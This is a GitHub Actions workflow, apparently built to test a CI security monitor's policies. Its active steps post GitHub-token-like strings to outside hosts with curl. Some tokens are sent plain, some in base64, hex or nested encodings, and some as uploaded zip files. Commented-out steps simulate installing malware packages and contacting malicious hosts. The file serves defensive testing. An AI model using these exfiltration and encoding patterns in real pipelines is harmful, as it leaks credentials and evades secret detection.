Python application #209
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| name: Python application | |
| on: | |
| workflow_dispatch: | |
| permissions: | |
| checks: write | |
| contents: write | |
| packages: read | |
| jobs: | |
| python-application-build: | |
| runs-on: ubuntu-latest | |
| name: Run build | |
| steps: | |
| # - name: Install Git v2.50.1 | |
| # run: | | |
| # # Install build dependencies for Git | |
| # sudo apt-get update | |
| # sudo apt-get install -y make libssl-dev libghc-zlib-dev libcurl4-gnutls-dev libexpat1-dev gettext wget | |
| # # Download, compile, and install Git v2.50.1 | |
| # wget https://github.com/git/git/archive/refs/tags/v2.50.1.tar.gz -O git.tar.gz | |
| # tar -xzf git.tar.gz | |
| # cd git-2.50.1 | |
| # make prefix=/usr/local all | |
| # sudo make prefix=/usr/local install | |
| # - name: Verify Git Version | |
| # run: git --version | |
| # ============= InvisiRisk Setup ============= | |
| - name: Setup PSE | |
| uses: invisirisk/pse-action@latest | |
| with: | |
| api_url: "https://app.stage.invisirisk.com" | |
| app_token: ${{ secrets.IR_API_KEY }} | |
| mode: "docker-intercept" | |
| # ============= InvisiRisk Setup End ============= | |
| - uses: actions/checkout@v4 | |
| - name: Use Python | |
| uses: actions/setup-python@v4 | |
| with: | |
| python-version: "3.9" | |
| # - name: docker | |
| # run: docker pull testcontainers/ryuk:0.12.0 | |
| # - name: Install downgraded package | |
| # continue-on-error: true | |
| # run: pip install requests==2.31.0 | |
| # - name: Install from unexpected source | |
| # continue-on-error: true | |
| # run: pip install numpy==1.9.3 --no-deps --index-url https://test.pypi.org/simple/ | |
| # - name: Install MALWARE package | |
| # continue-on-error: true | |
| # run: curl -k -O https://files.pythonhosted.org/packages/83/5c/0627be4c9976d56b1217cb5187b7504e7fd7d3503f8bfd312a04077bd4f7/abilityrequests-0.0.5-py2.py3-none-any.whl.metadata | |
| # - name: Install with different checksum | |
| # continue-on-error: true | |
| # run: pip install --no-cache-dir --no-deps boto3==1.4.0 --index-url https://test.pypi.org/simple/ | |
| # - name: Contact new endpoint | |
| # continue-on-error: true | |
| # run: curl https://malicious.com/ | |
| # - name: Run unusual command | |
| # continue-on-error: true | |
| # run: wget https://www.w3.org/TR/PNG/iso_8859-1.txt | |
| # - name: Create unexpected file | |
| # continue-on-error: true | |
| # run: echo "Suspicious content" > suspicious2.txt | |
| # - name: Make cURL request | |
| # run: curl https://package-registry.free.beeceptor.com/packages | |
| # - name: Simulate long-running task | |
| # continue-on-error: true | |
| # run: sleep 200 | |
| # # # - name: 😈 Execute malicious script | |
| # # # run: bash run_malicious_scripts.sh | |
| - name: Secret Leak Policy | |
| run: | | |
| curl -k -X GET https://vbirmock.free.beeceptor.com/hack \ | |
| -H "Content-Type: application/json" \ | |
| -d '{ | |
| "GH": "ghp_DEFzmg7RHrQ2eMe2IF4NxNWQodYpab3VMXXX" | |
| }' | |
| echo "Exit code: $?" | |
| - name: Mock API key exposure request | |
| run: | | |
| curl "https://example.com/data?api_key=ghp_N4GLp6K2gwqWupGTRjz9P7AOth62XP5OhliA" | |
| # - name: Response Status Code Policy (Trigger 400 Bad Request) | |
| # run: curl -k -X POST https://api.github.com/endpoint | |
| # - name: Mime Type Policy | |
| # run: curl -s -L "https://tinyurl.com/invisirisk" | |
| - name: 📝 Create and Compress the File | |
| run: | | |
| # 1. Create a dummy file for the mock | |
| echo "-d '{"data":{"GH":"ghp_DEFzmg7RHrQ2eMe2IF4NxNWQodYpab3VMXXX"}}'" > dummy_file.txt | |
| # 2. Create the leaks.zip file in the working directory | |
| zip leaks.zip dummy_file.txt | |
| - name: 📝 Create and Compress the File With base64 secrets | |
| run: | | |
| # 1. Create a dummy file for the mock | |
| echo "-d '{"data":{"GH":"WjJod1gwUkZSbnB0WnpkU1NISlJNbVZOWlRKSlJqUk9lRTVYVVc5a1dYQmhZak5XVFZoWVdBPT0="}}'" > dummy_file_64.txt | |
| # 2. Create the leaks.zip file in the working directory | |
| zip leaks64.zip dummy_file_64.txt | |
| - name: 🚀 Upload the generated Zip File | |
| run: | | |
| # Since the 'zip' command ran in the root directory, | |
| # the path is simply 'leaks.zip' | |
| curl -X POST https://archivedSecrets.com \ | |
| -F "file=@leaks.zip" \ | |
| -H "Content-Type: application/form-data" | |
| - name: 🚀 Upload the generated Zip File base64 | |
| run: | | |
| # Since the 'zip' command ran in the root directory, | |
| # the path is simply 'leaks.zip' | |
| curl -X POST https://archivedSecretsbase64.com \ | |
| -F "file=@leaks64.zip" \ | |
| -H "Content-Type: application/form-data" | |
| - name: Mock API key exposure request (Normal) | |
| run: | | |
| curl -X POST https://normalsecrets.com \ | |
| -H "Content-Type: application/json" \ | |
| -d '{"data":{"GH":"ghp_DEFzmg7RHrQ2eMe2IF4NxNWQodYpab3VMXXX"}}' | |
| - name: Mock API key exposure request (HEX to BASE64) | |
| run: | | |
| curl -X POST https://HEXtoBase64.com \ | |
| -H "Content-Type: application/json" \ | |
| -d '{"data":{"GH":"Njc2ODcwNWY0NDQ1NDY3YTZkNjczNzUyNDg3MjUxMzI2NTRkNjUzMjQ5NDYzNDRlNzg0ZTU3NTE2ZjY0NTk3MDYxNjIzMzU2NGQ1ODU4NTg="}}' | |
| - name: Mock API key exposure request (HEX to BASE64 to HEX) | |
| run: | | |
| curl -X POST https://HEXtoBase64toHEX.com \ | |
| -H "Content-Type: application/json" \ | |
| -d '{"data":{"GH":"4e6a63324f4463774e5759304e4451314e44593359545a6b4e6a637a4e7a55794e4467334d6a55784d7a49324e54526b4e6a557a4d6a51354e44597a4e44526c4e7a67305a5455334e5445325a6a59304e546b334d4459784e6a497a4d7a55324e4751314f4455344e54673d"}}' | |
| - name: 3 level base64 encoding secrets | |
| run: | | |
| curl -X POST https://base64encodedsecrets.com \ | |
| -H "Content-Type: application/json" \ | |
| -d '{"data":{"GH":"V2pKb2QxZ3dVa1pTYm5CMFducGtVMU5JU2xKTmJWWk9XbFJLU2xKcVVrOWxSVFZZVlZjNWExZFlRbWhaYWs1WFZGWm9XVmRCUFQwPQ=="}}' | |
| - name: hex encoded | |
| run: | | |
| curl -X POST https://hexencodedsecrets.com \ | |
| -H "Content-Type: application/json" \ | |
| -d '{"data":{"GH":"6768705f4445467a6d67375248725132654d65324946344e784e57516f645970616233564d585858"}}' | |
| - name: secrets on response | |
| run: | | |
| curl -k https://pastebin.com/raw/V4FrgKcm | |
| # - name: Send POST request with curl | |
| # run: | | |
| # curl -X POST https://example.com/api \ | |
| # -H "Content-Type: application/json" \ | |
| # -d '{"key1":"value1", "key2":"value2"}' | |
| # - name: new host | |
| # run: curl https://www.google.com | |
| # - name: Simple PUT request | |
| # run: | | |
| # curl -X PUT https://example.com/api/resource \ | |
| # -H "Content-Type: application/json" \ | |
| # -d '{"key": "value"}' | |
| # - name: Install dependencies | |
| # run: pip install -r requirements.txt | |
| # ============= InvisiRisk Cleanup ============= | |
| - name: Cleanup PSE | |
| if: always() | |
| uses: invisirisk/pse-action@latest | |
| with: | |
| cleanup: "true" | |
| # ============= InvisiRisk Cleanup End ============= | |
| gather_analytics: | |
| runs-on: ubuntu-latest | |
| name: Gather Analytics | |
| needs: python-application-build | |
| if: always() | |
| steps: | |
| - name: Gather Status | |
| uses: invisirisk/pse-action@latest | |
| with: | |
| api_url: "https://app.stage.invisirisk.com" | |
| app_token: ${{ secrets.IR_API_KEY }} | |
| send_job_status: "true" | |
| debug: "true" |